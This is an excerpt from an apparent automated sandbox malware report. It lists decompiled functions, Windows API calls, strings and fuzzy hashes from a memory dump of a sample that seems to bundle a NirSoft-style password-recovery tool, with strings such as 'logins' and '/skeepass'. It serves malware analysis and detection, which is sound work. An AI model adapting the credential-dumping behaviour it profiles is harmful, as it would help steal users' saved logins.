                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3330709923-517860148
                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                              Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040806A
                                                              • memset.MSVCRT ref: 0040807F
                                                              • _wtoi.MSVCRT ref: 004081AF
                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                              • memset.MSVCRT ref: 004081E4
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                              • String ID: logins$null
                                                              • API String ID: 3492182834-2163367763
                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                              Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT ref: 004086DB
                                                              • _mbscpy.MSVCRT ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041087D
                                                              • memset.MSVCRT ref: 00410892
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1010922700-0
                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                              Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 4233704886-1717621600
                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2012295524-70141382
                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                              Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                              Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                              • memcpy.MSVCRT ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4066021378-1856150674
                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                              • memset.MSVCRT ref: 0040DA23
                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                              • String ID: caption
                                                              • API String ID: 973020956-4135340389
                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                              Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf$wcscpy
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                              • API String ID: 1283228442-2366825230
                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                              Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00413972
                                                              • wcscpy.MSVCRT ref: 00413982
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              • wcscpy.MSVCRT ref: 004139D1
                                                              • wcscat.MSVCRT ref: 004139DC
                                                              • memset.MSVCRT ref: 004139B8
                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                              • memset.MSVCRT ref: 00413A00
                                                              • memcpy.MSVCRT ref: 00413A1B
                                                              • wcscat.MSVCRT ref: 00413A27
                                                              Strings
                                                              Memory Dump Source
